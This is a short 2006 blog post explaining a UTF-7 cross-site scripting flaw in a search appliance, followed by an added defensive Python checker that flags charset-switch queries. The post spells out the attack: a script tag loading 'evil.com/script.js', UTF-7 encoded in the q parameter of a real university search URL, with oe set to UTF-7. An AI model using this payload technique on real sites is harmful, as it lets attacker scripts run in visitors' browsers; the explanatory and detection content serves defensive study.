Wednesday, November 29, 2006

google appliance xss

Multiple sources have been reporting a Google Appliance XSS attack. In short, the attack allows someone to tweak the variables sent to a search page in a way that lets arbitrary scripts from any domain be executed on the results page.

Say I do a search at IU's search page, and when the results are shown to me I am directed to this url:
http://search.iu.edu/search?q=thing&output=xml_no_dtd&oe=UTF-8&...

I can change the q and oe variables such that the q variable has <script src="evil.com/script.js"></script> encoded in UTF-7, and then set oe to UTF-7 so the q variable is decoded. Then when the results are shown, evil.com/script.js is loaded on the page.
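To make the charset trick concrete from the defender's side, here is an added example (my own code, not part of the original post or Google's appliance) that inspects a search URL the way a reverse proxy or log filter could: it allow-lists the oe parameter and decodes q with whatever charset was requested, flagging queries whose markup characters only appear after decoding. The hostname and query values are constructed for the example.

```python
from urllib.parse import parse_qs, urlsplit

# Output encodings the results page is allowed to use.  UTF-7 is never needed
# for a results page, so anything else is suspicious and should be forced back
# to UTF-8 before the appliance sees it.
ALLOWED_OUTPUT_ENCODINGS = {"utf-8", "utf8"}
MARKUP_CHARS = set('<>"\'')


def inspect_search_url(url):
    """Inspect a search-results URL for a charset-switch XSS attempt.

    Returns a dict with:
      oe            - the requested output encoding (lower-cased)
      oe_allowed    - whether it is on the allow-list
      hidden_markup - True if <, >, " or ' appear in q only after decoding it
                      with the requested charset, i.e. a filter that looks at
                      the raw bytes would miss it
      decoded_query - q as a browser honouring that charset would read it
    """
    # latin-1 maps every raw byte to one character, so the query can be
    # re-encoded losslessly and then decoded with the charset the URL asked for.
    params = parse_qs(urlsplit(url).query, keep_blank_values=True,
                      encoding="latin-1")
    oe = params.get("oe", ["utf-8"])[0].strip().lower()
    raw_query = params.get("q", [""])[0]
    raw_bytes = raw_query.encode("latin-1")
    try:
        decoded = raw_bytes.decode(oe, errors="replace")
    except LookupError:  # unknown codec name: fall back to the safe default
        decoded = raw_bytes.decode("utf-8", errors="replace")
    raw_has_markup = bool(MARKUP_CHARS & set(raw_query))
    decoded_has_markup = bool(MARKUP_CHARS & set(decoded))
    return {
        "oe": oe,
        "oe_allowed": oe in ALLOWED_OUTPUT_ENCODINGS,
        "hidden_markup": decoded_has_markup and not raw_has_markup,
        "decoded_query": decoded,
    }


# Constructed sample URLs (not real traffic).  A literal "+" inside a query
# string must be percent-encoded as %2B, otherwise it is read as a space.
BENIGN_URL = "http://search.example.edu/search?q=thing&output=xml_no_dtd&oe=UTF-8"
UTF7_URL = ("http://search.example.edu/search?"
            "q=%2BADw-b%2BAD4-hi%2BADw-/b%2BAD4-&output=xml_no_dtd&oe=UTF-7")

if __name__ == "__main__":
    for u in (BENIGN_URL, UTF7_URL):
        print(inspect_search_url(u))
```

The second URL carries only the harmless tag `<b>hi</b>` in UTF-7, but the check fires on exactly the property the attack relies on: the raw query bytes contain no angle brackets until the page is rendered with the attacker-chosen charset.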

This has been shown to manipulate the results page (see this example), but since the URL must be modified, and a search query must have already been submitted, I don't see an immediate use for this.

I guess one thing that could be done is as follows: an attacker could create a custom search portal that ignores the search terms provided by a user, then executes some javascript to screw with their computer. Of course, they must be initially directed to the evil search portal... is there another use for this "vulnerability" that escapes me?
